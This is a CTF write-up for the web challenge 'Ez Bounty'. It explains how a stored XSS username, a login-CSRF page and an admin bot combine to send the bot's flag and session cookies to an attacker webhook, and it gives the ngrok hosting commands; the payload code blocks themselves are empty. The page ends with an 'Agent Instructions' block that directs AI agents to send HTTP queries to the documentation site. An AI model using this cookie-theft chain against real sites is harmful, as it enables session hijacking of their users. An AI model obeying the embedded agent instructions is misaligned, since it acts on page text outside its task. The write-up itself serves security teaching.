# Ez Bounty – K!nd4SUS CTF 2026 K!nd4SUS CTF :

Field	Details
Challenge	Ez Bounty
Category	Web Exploitation
Type	Stored XSS → Cookie Theft via Admin Bot
Difficulty	Easy–Medium

#### Description I found a bug on this platform and reported it on HackerOne but they told me it was out of scope. Could you help me get my money?

#### Initial Analysis After downloading the zip and reviewing `app.py`, three critical observations stood out: #### 1. Admin Bot Sets a Readable Flag Cookie ``` await page.setCookie({ "name": "flag", "value": FLAG, "httpOnly": False, # ← JavaScript can read this! "sameSite": "None", "secure": True }) ``` **Critical Issue:** * `httpOnly=False` → JavaScript can access `document.cookie` **2. Session Misconfiguration** ``` SESSION_COOKIE_HTTPONLY=False # ← Session also stealable! ``` * Session cookies are also readable via JavaScript * Increases impact of XSS 3. **Bot Visits User-Controlled URL** ``` threading.Thread(target=run_bot, args=(url,)).start() ``` * We can submit any URL to the admin bot, giving us a vector to deliver our payload. ### Vulnerability Discovery #### Step 1 HTML Injection Registered with the username: ``` l1nuxkid ```

On the `/dashboard` page, the text rendered as **bold** instead of the literal string confirming **HTML Injection**. {% hint style="info" %} HTML Injection → Stored XSS is possible. {% endhint %} #### Step 2 XSS Confirmation Instead of inserting HTML, I attempted to register and log in using the payload below. ```

```

Voila The alert fired **Stored XSS confirmed**. Any script in the username executes when the dashboard renders.

### Exploitation Strategy The attack chain:

#### Step 1 Created Malicious Account * Registered an account with the following XSS payload as the username: ``` ``` password : `lol` This payload, once executed in the browser, sends all cookies on the app's domain to our webhook. #### Step 2 Craft the Malicious Page The bot has the flag cookie on the app's domain. We need JavaScript to run on the app's domain to read it. Our XSS payload is stored in our account's username. So we need the bot to be logged into our account and visit /dashboard. #### Malicious Page (`index.html`) ``` ``` \ **Breaking Down the Payload**

Part	Purpose
`action="…/login"`	Submits credentials to the app's login endpoint
`<script>…</script>`	HTML-encoded XSS payload — browser decodes it before submitting, server matches it to our stored username
`credentials: "include"`	Sends the bot's admin session cookie with the logout request
`mode: "no-cors"`	We don't need the response — just need logout to complete
`.then(() => …submit())`	Ensures logout finishes before logging into attacker account

> **Why logout first?** If the bot is already logged in, `/login` just redirects to `/dashboard` showing the admin's username not ours. Logging out first ensures our attacker account gets loaded. After successful login, the app redirects the bot to `/dashboard`, where our stored XSS username renders and the script executes. #### Step 3 Host Payload * Hosted the malicious page locally: ``` python3 -m http.server 80 ``` Expose it via ngrok (temporary tunnel): ``` ngrok http 80 ``` Submit the ngrok URL to the bot at `/report`: ``` https://.ngrok-free.app ```

### Result The admin bot: 1. Visited our malicious page 2. Logged out of the admin account 3. Logged into our attacker account 4. Rendered `/dashboard` — XSS fired 5. Sent all cookies to our webhook

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/ctftime.org-writeups/ez-bounty-k-nd4sus-ctf-2026.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.